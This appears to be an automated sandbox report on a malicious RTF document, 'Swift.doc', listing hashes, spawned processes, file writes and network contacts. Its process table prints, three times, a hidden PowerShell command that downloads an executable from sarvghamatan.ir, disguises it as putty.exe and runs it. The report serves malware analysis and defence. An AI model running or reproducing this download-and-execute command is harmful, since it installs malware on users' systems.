File name: | Swift.doc |
Full analysis: | https://app.any.run/tasks/c599d250-26b0-4ad9-ade0-38c0f55f7744 |
Verdict: | Malicious activity |
Analysis date: | July 12, 2020, 22:02:17 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | text/rtf |
File info: | Rich Text Format data, version 1, unknown character set |
MD5: | 5C16523A2267303D611854168918FEA0 |
SHA1: | 92A43B0E860192B7D4F06C031190B49EE4D155EB |
SHA256: | 35DB1A2A7FF3D2D81057DB8C3901DD766171613FDE771FBF8183067C36F10A68 |
SSDEEP: | 1536:mAoooooooooooooooooooooooooooooouooooooooooooooooooooooooooooouw:mjs7aRDAw5wf5 |
.rtf | | | Rich Text Format (100) |
---|
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2184 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Swift.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | explorer.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
1000 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://sarvghamatan.ir/js/NW.exe','C:\Users\admin\AppData\Roaming\putty.exe');Start-Process 'C:\Users\admin\AppData\Roaming\putty.exe'" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WINWORD.EXE | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3956 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://sarvghamatan.ir/js/NW.exe','C:\Users\admin\AppData\Roaming\putty.exe');Start-Process 'C:\Users\admin\AppData\Roaming\putty.exe'" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2836 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://sarvghamatan.ir/js/NW.exe','C:\Users\admin\AppData\Roaming\putty.exe');Start-Process 'C:\Users\admin\AppData\Roaming\putty.exe'" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WINWORD.EXE | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
2184 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRCC91.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2184 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\29BEF94D.png | — | |
MD5:— | SHA256:— | |||
1000 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\WXDNZTPTPW9BBAFBVFNO.temp | — | |
MD5:— | SHA256:— | |||
3956 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\UL4I16RR4H2LATE01S5M.temp | — | |
MD5:— | SHA256:— | |||
2836 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\RNQD9IWPXFERDBUFX5SP.temp | — | |
MD5:— | SHA256:— | |||
1000 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF15d943.TMP | binary | |
MD5:4904FBDEFCB0E46FF8AA7DF9BF6FA721 | SHA256:678F0FA711DC068DB64F7A3A540135527D85BD1808421CF0BA1D928FA4267C49 | |||
2836 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF164ae8.TMP | binary | |
MD5:4904FBDEFCB0E46FF8AA7DF9BF6FA721 | SHA256:678F0FA711DC068DB64F7A3A540135527D85BD1808421CF0BA1D928FA4267C49 | |||
2184 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$Swift.doc | pgc | |
MD5:D5DA8F21467C93CC33AEBDFDB1E2C88E | SHA256:6CDD0A76C817354FD928929DFC8DB70DB5B7D14921714926F1C45D367B3E8BF8 | |||
2184 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\MSO1045.acl | binary | |
MD5:31B7B5DB8882E5D2DE0EC8041510D107 | SHA256:505286F52CE8358FCC6DE01C1D96A8100CF2A1DA007CF8899529410F577054F2 | |||
3956 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF15da7b.TMP | binary | |
MD5:4904FBDEFCB0E46FF8AA7DF9BF6FA721 | SHA256:678F0FA711DC068DB64F7A3A540135527D85BD1808421CF0BA1D928FA4267C49 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2184 | WINWORD.EXE | GET | 404 | 185.55.224.79:80 | http://sarvghamatan.ir/js/NW.exe | IR | html | 12.2 Kb | suspicious |
2184 | WINWORD.EXE | GET | 404 | 185.55.224.79:80 | http://sarvghamatan.ir/js/NW.exe | IR | html | 12.2 Kb | suspicious |
1000 | powershell.exe | GET | 404 | 185.55.224.79:80 | http://sarvghamatan.ir/js/NW.exe | IR | html | 12.2 Kb | suspicious |
2184 | WINWORD.EXE | GET | 404 | 185.55.224.79:80 | http://sarvghamatan.ir/js/NW.exe | IR | html | 12.2 Kb | suspicious |
2836 | powershell.exe | GET | 404 | 185.55.224.79:80 | http://sarvghamatan.ir/js/NW.exe | IR | html | 12.2 Kb | suspicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
1000 | powershell.exe | 185.55.224.79:80 | sarvghamatan.ir | Fanavari Serverpars Argham Gostar Company Ltd. | IR | suspicious |
2184 | WINWORD.EXE | 185.55.224.79:80 | sarvghamatan.ir | Fanavari Serverpars Argham Gostar Company Ltd. | IR | suspicious |
2836 | powershell.exe | 185.55.224.79:80 | sarvghamatan.ir | Fanavari Serverpars Argham Gostar Company Ltd. | IR | suspicious |
Domain | IP | Reputation |
---|---|---|
sarvghamatan.ir |
| suspicious |